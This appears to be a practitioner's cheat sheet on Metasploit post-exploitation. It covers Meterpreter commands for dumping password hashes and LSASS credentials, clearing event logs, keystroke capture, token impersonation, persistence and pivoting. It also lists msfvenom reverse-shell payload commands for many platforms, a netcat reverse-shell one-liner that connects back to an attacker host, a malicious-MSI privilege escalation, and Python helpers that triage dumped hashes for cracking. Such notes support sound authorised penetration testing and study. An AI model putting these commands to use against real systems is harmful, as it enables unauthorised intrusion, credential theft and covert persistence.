Metasploit Documentation: Scanning and Managing Hosts
Payloads can be divided into:
singles (stageless), with "_" separating "shell" (or "meterpreter") from the rest of the payload name, as in shell_reverse_tcp: the whole payload is delivered in one piece;
staged, with "/" separating "shell" (or "meterpreter") from the rest of the payload name, as in shell/reverse_tcp: a small stager connects back first and fetches the rest of the payload from the handler.
Payload names follow the pattern OS/ARCHITECTURE/PAYLOAD, e.g. linux/x86/meterpreter/reverse_tcp or windows/x64/meterpreter/reverse_tcp (ARCHITECTURE is omitted for 32-bit Windows payloads, so windows/meterpreter/reverse_tcp is the 32-bit one).
NOTE: Metasploit defaults to 32-bit payloads, but an increasing number of things (credential dumping with kiwi, migrating into 64-bit processes) won't work on a 64-bit system from a 32-bit Meterpreter session. It's best to explicitly set the payload option to a 64-bit payload unless you know that you'll be dealing with a 32-bit system.
List all available payloads using
msfvenom --list payloads or
show payloads from within the Metasploit console.
A specific payload is selected in the Metasploit console with set PAYLOAD full/path/to/payload.
If you initially get a native shell, use the post/multi/manage/shell_to_meterpreter module to upgrade it to Meterpreter. (NOTE: shell_to_meterpreter starts a second handler and makes a new connection on a new port, 4433 by default, so that port has to be reachable from the target.)
The Meterpreter reverse shell requires a connection back to msfconsole using multi/handler.
background - background the current session and return to the Metasploit console
clearev - clear the Windows event logs (Application, System, Security); note that clearing the Security log itself writes an "audit log was cleared" event, so this is not stealthy
creds_all - dump all credentials Mimikatz can find in memory (requires the kiwi extension and SYSTEM privileges; see load kiwi below)
download - transfer a file from the target to the attacker
edit - edit a file on the target
getpid - get the current process ID
getprivs - list (and try to enable) the privileges available to the current process
getsystem - attempt to elevate to NT AUTHORITY\SYSTEM (Windows only)
getuid - get the user the current process is running as
golden_ticket_create - create a Kerberos golden ticket (requires the kiwi extension, plus the krbtgt NTLM hash and the domain SID)
guid - get the session GUID
hashdump - dump password hashes from the SAM (Windows only, requires SYSTEM privileges); each line is username:RID:LM hash:NTLM hash:::, where the RID is the final component of the account's SID (500 is the built-in Administrator, 501 Guest)
ifconfig - display host network interface information
info - get information about a post module
load - load a Meterpreter extension
load kiwi - load the Mimikatz (kiwi) extension
migrate - migrate Meterpreter into another process
netstat - display host network connections
portfwd - forward a local port through the session to a host/port reachable from the target
route - view or modify the target's routing table
run - run a post module or Meterpreter script against the current session
search - search the target's file system for files
sessions - switch to another (Metasploit) session
shell - drop to a system shell on the target (CTRL + Z backgrounds the shell channel and returns to Meterpreter; exit closes it)
sysinfo - pull remote system information
upload - transfer a file from the attacker to the target
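The hashdump line format is worth being able to parse mechanically: the RID tells you which accounts are built-in, the LM field tells you whether LM hashes are still being stored, and the well-known NT hash of the empty string identifies accounts with blank passwords. As an added example for these notes (not Metasploit's own code), the following parses a dump, triages it (blank passwords, stored LM hashes, accounts sharing one NT hash), and emits the user:hash lines that hashcat -m 1000 --username accepts. The sample dump is constructed from standard test vectors (the LM and NT hashes of "password"), not taken from a real host.

```python
"""Parse and triage Meterpreter `hashdump` output.

Added example for these notes, not part of Metasploit. SAMPLE_DUMP below is
constructed from public test vectors, not captured from a real system.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Sentinel values: the LM field when no LM hash is stored, and the NT hash
# of the empty string (i.e. the account has a blank password).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# username:RID:LM:NT::: as printed by hashdump
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")


@dataclass
class Account:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def lm_stored(self) -> bool:
        return self.lm != EMPTY_LM

    @property
    def blank_password(self) -> bool:
        return self.nt == EMPTY_NT

    @property
    def builtin(self) -> bool:
        # RIDs below 1000 are reserved for well-known accounts (500 Administrator, 501 Guest, ...)
        return self.rid < 1000


def parse_hashdump(text: str) -> list[Account]:
    """Turn hashdump output into Account records; reject anything malformed."""
    accounts: list[Account] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError(f"unrecognised hashdump line: {line!r}")
        user, rid, lm, nt = m.groups()
        accounts.append(Account(user, int(rid), lm.lower(), nt.lower()))
    return accounts


def triage(accounts: list[Account]) -> dict:
    """Group the findings a practitioner checks first."""
    by_nt: dict[str, list[str]] = {}
    for a in accounts:
        if not a.blank_password:
            by_nt.setdefault(a.nt, []).append(a.user)
    return {
        "blank_password": [a.user for a in accounts if a.blank_password],
        "lm_stored": [a.user for a in accounts if a.lm_stored],
        # same NT hash == same password: reuse between accounts
        "shared_nt": {h: users for h, users in by_nt.items() if len(users) > 1},
    }


def hashcat_lines(accounts: list[Account]) -> list[str]:
    """user:hash lines for `hashcat -m 1000 --username`, skipping blank passwords."""
    return [f"{a.user}:{a.nt}" for a in accounts if not a.blank_password]


# Constructed sample: Administrator and alice both use "password"; alice's
# box still stores the LM hash; Guest and DefaultAccount have blank passwords.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
"""

if __name__ == "__main__":
    accts = parse_hashdump(SAMPLE_DUMP)
    print(triage(accts))
    print("\n".join(hashcat_lines(accts)))
```

The shared_nt check is the one that pays off most often: a local account whose NT hash matches a domain or Administrator account is a pass-the-hash candidate before any cracking starts.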
Meterpreter sessions can be backgrounded using the background command or CTRL + Z. List sessions using the sessions command, and foreground a session using sessions -i #, where # is the session number.
Potentially useful Metasploit modules to run from or alongside Meterpreter:
post/windows/gather/checkvm - try to determine if we're in a VM
post/multi/recon/local_exploit_suggester - find possible privilege escalation exploits (can be slow and unreliable on 64-bit targets; it only considers exploits compatible with the session's platform and architecture, so a 32-bit Meterpreter on a 64-bit host will not be offered the x64-only ones)
post/windows/gather/enum_shares - enumerate shares
auxiliary/scanner/smb/smb_enumusers_domain - enumerate SMB domain users (requires existing admin credentials)
post/windows/gather/hashdump - same as the hashdump command, but pushes the hashes into the Metasploit DB
post/windows/gather/smart_hashdump GETSYSTEM=FALSE - same idea, but picks the dump technique based on privilege level and whether the host is a domain controller, and pushes the hashes into the Metasploit DB; GETSYSTEM=FALSE stops it from attempting getsystem first
auxiliary/analyze/crack_windows - sic John the Ripper or Hashcat on NTLM hashes stored in the Metasploit DB
post/windows/manage/enable_rdp - enable RDP access (requires admin privileges)
post/multi/manage/autoroute - add routes through the session so other Metasploit modules can reach the target's networks (pivoting)
auxiliary/server/socks_proxy - start a SOCKS proxy on the attacker side that sends traffic through those routes
exploit/windows/local/persistence - sets up a persistent payload (you probably want to set STARTUP SYSTEM)... without a password, so anyone who can stand up a handler for it gets the shell!
NOTE: It is generally more useful to background Meterpreter and then run these commands through the Metasploit console, as within Meterpreter they need to have all options specified on the “run” command line (in the console you can access help, actually see what the options are, etc.).
There seem to be a lot of options for the auxiliary/server/socks_proxy module, but I don't see a way to access them from Meterpreter (it looks like to get help you need to background Meterpreter and use the console).
The advantage of the SOCKS proxy is that you can then point proxychains at it and route ordinary tools through the session; this lets you pivot more deeply into the network that you're attacking. (You probably want to create a custom proxychains.conf with a line such as socks5 127.0.0.1 1080, matching the module's SRVPORT (default 1080) and VERSION. Fortunately, /etc/proxychains.conf is well documented.)
load powershell
powershell_shell
Don’t try to exit PowerShell - trying to do this produces consistent hangs for me. Instead, background the process with
load kiwi to load up Mimikatz. The sub-command list below is from the older mimikatz extension; in kiwi the credential commands are prefixed creds_ (creds_all, creds_msv, creds_kerberos, creds_ssp, creds_tspkg, creds_wdigest) and arbitrary Mimikatz commands go through kiwi_cmd. Sub-commands:
kerberos # Attempt to retrieve kerberos creds
livessp # Attempt to retrieve livessp creds
mimikatz_command # Run a custom command
msv # Attempt to retrieve msv creds (hashes)
ssp # Attempt to retrieve ssp creds
tspkg # Attempt to retrieve tspkg creds
wdigest # Attempt to retrieve wdigest creds
load incognito
list_tokens -u
impersonate_token $DOMAIN\\$USER
Not 100% sure where the “tokens” come from here… Mimikatz, maybe?
I think that Meterpreter is being run directly from memory, and what migrate is doing is basically creating a new thread in the memory of a different process, hopping to that process, and then shutting down the old one.
Reasons to migrate the Meterpreter process:
In particular, harvesting credentials from LSASS requires that Meterpreter live in a process with the same privileges (NT AUTHORITY\SYSTEM) and the same architecture as LSASS; migrating Meterpreter is how you get there. The print spooler service (spoolsv.exe) is often a good choice, as it runs as SYSTEM, matches the architecture of the OS, and restarts itself automatically if it dies. You can also migrate into lsass.exe directly if you feel like living dangerously (if Meterpreter takes LSASS down with it, the machine reboots).
Another example is keystroke capture: keyscan_start only sees keystrokes delivered to the desktop of the process Meterpreter lives in, so to log what the user types you migrate into a process in their interactive session (explorer.exe is the usual choice); winlogon.exe catches what is typed at the logon screen.
Note that Meterpreter will happily let you migrate from a privileged to an unprivileged process, which may cause you to lose control of the target system! Additionally, migrating Meterpreter changes its current working directory to that of the process it's attaching to.
Msfvenom is a tool to create custom versions of Metasploit payloads, encoded into a variety of different binary formats and scripts. For example:
# Use msfvenom to generate the code for a remote shell:
msfvenom -p cmd/unix/reverse_netcat lhost=$LOCAL_IP lport=$LOCAL_PORT
# Spin up a listener using netcat (start this before the payload runs on the target):
nc -lvp $LOCAL_PORT
This generates code that looks like this:
mkfifo /tmp/qdsrgu; nc $LOCAL_IP $LOCAL_PORT 0</tmp/qdsrgu | /bin/sh >/tmp/qdsrgu 2>&1; rm /tmp/qdsrgu
What's going on here?
mkfifo /tmp/qdsrgu creates a named pipe at /tmp/qdsrgu.
nc $LOCAL_IP $LOCAL_PORT connects back to the attacker's listener. The pipe is wired to netcat's STDIN (0</tmp/qdsrgu), netcat's output (whatever the attacker types) is piped into a shell that almost certainly exists (| /bin/sh), and the shell's STDOUT and STDERR are redirected back into the named pipe (>/tmp/qdsrgu 2>&1), closing the loop. When the connection drops, rm /tmp/qdsrgu removes the pipe.
nc -lvp $LOCAL_PORT on the attacker side listens for the incoming netcat connection from the remote. Anything we type on STDIN here gets sent to the remote netcat and piped into /bin/sh there. The output of /bin/sh goes into the named pipe, which feeds the remote netcat's STDIN, which sends the data back to the local machine where it ends up on STDOUT. (The pipe sits in /tmp for as long as the shell is up, so it is visible to anyone who looks at the target's file system.)
Use msfvenom --list formats to see the available output formats (encoders are listed separately with --list encoders).
# 32-bit Linux ELF Meterpreter payload
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -f elf > rev_shell
# 32-bit macOS Mach-O reverse shell (a plain shell, not Meterpreter)
msfvenom -p osx/x86/shell_reverse_tcp LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -f macho > rev_shell
# 32-bit Windows executable Meterpreter payload (use windows/x64/meterpreter/reverse_tcp for 64-bit)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -f exe > rev_shell.exe
# PHP Meterpreter payload (stageless)
msfvenom -p php/meterpreter_reverse_tcp LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -f raw > rev_shell.php
# ASP Meterpreter payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -f asp > rev_shell.asp
# JSP reverse shell (not Meterpreter)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -f raw > rev_shell.jsp
# Python reverse shell one-liner (not Meterpreter)
msfvenom -p cmd/unix/reverse_python LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -f raw > rev_shell.py
# Bash reverse shell one-liner (not Meterpreter)
msfvenom -p cmd/unix/reverse_bash LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -f raw > rev_shell.sh
# Perl reverse shell one-liner (not Meterpreter)
msfvenom -p cmd/unix/reverse_perl LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -f raw > rev_shell.pl
The cmd/unix/* and *shell_reverse_tcp payloads give you a plain shell, not a Meterpreter session; catch them with netcat or with multi/handler set to the same payload.
System-specific shellcode can also be produced by appropriately varying the -p (payload) and -f (format) options.
The architecture of what msfvenom produces follows the payload you choose, not the -f exe format: a payload under windows/x64/ gives a 64-bit PE, windows/meterpreter/reverse_tcp gives a 32-bit one. A 64-bit binary won't work if you're trying to replace a program in Program Files (x86); in that case you need to explicitly give msfvenom a 32-bit payload (no x64 in the path, optionally with -a x86 to make the architecture explicit).
If AlwaysInstallElevated is set to 1 under both of the following registry keys, then MSI packages installed by any user run as SYSTEM (both values must be 1; one alone is not enough, and a missing key counts as 0):
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
Generate a malicious MSI file with msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f msi -o $INSTALLER.msi
Then install on the target to get a shell:
msiexec /quiet /qn /i $INSTALLER.msi
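The registry check is the gate for this path: both values have to be REG_DWORD 1, and the usual result on a hardened host is that the key does not exist at all. As an added example for these notes (not Metasploit code), the following parses the captured output of the two reg query commands above, as you would paste it back from a shell on the target, and answers whether the MSI route applies, treating a missing key or an explicit 0 in either hive as "no". The sample outputs are constructed to mirror reg.exe's format, including its CRLF line endings and its ERROR line for an absent key.

```python
"""Decide from captured `reg query` output whether AlwaysInstallElevated
applies. Added example for these notes, not Metasploit code; the sample
strings below are constructed to mirror what reg.exe prints.
"""
from __future__ import annotations

import re

# The value line reg.exe prints, e.g.
#     AlwaysInstallElevated    REG_DWORD    0x1
VALUE_RE = re.compile(
    r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+(0x[0-9a-fA-F]+|\d+)\s*$",
    re.IGNORECASE | re.MULTILINE,
)


def always_install_elevated(reg_output: str) -> bool | None:
    """Read the value out of one `reg query` result.

    Returns True/False for a present REG_DWORD, or None when the key or
    value is absent (reg.exe then prints only an ERROR line).
    """
    m = VALUE_RE.search(reg_output)
    if m is None:
        return None
    return int(m.group(1), 0) == 1


def msi_escalation_possible(hkcu_output: str, hklm_output: str) -> bool:
    """The policy only takes effect when BOTH hives carry the value 1."""
    return (always_install_elevated(hkcu_output) is True
            and always_install_elevated(hklm_output) is True)


# Constructed samples (CRLF line endings, as reg.exe emits them).
HKCU_ENABLED = (
    "\r\nHKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Installer\r\n"
    "    AlwaysInstallElevated    REG_DWORD    0x1\r\n\r\n"
)
HKLM_ENABLED = (
    "\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\r\n"
    "    AlwaysInstallElevated    REG_DWORD    0x1\r\n\r\n"
)
HKLM_DISABLED = HKLM_ENABLED.replace("0x1", "0x0")
KEY_MISSING = (
    "ERROR: The system was unable to find the specified registry key or value.\r\n"
)

if __name__ == "__main__":
    for label, hkcu, hklm in [
        ("both set to 1", HKCU_ENABLED, HKLM_ENABLED),
        ("HKLM explicitly 0", HKCU_ENABLED, HKLM_DISABLED),
        ("HKLM key missing", HKCU_ENABLED, KEY_MISSING),
    ]:
        print(f"{label}: {msi_escalation_possible(hkcu, hklm)}")
```

Only the first case is worth generating an MSI for; the other two are the common outcomes and the installer would simply run as the current user.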
Use the exploit/multi/handler module in Metasploit to catch the shells produced with msfvenom (note that you'll need set payload to tell Metasploit what it's catching: the handler's payload, LHOST and LPORT must match what was baked into the msfvenom output). Both regular reverse shells and Meterpreter sessions can be caught this way.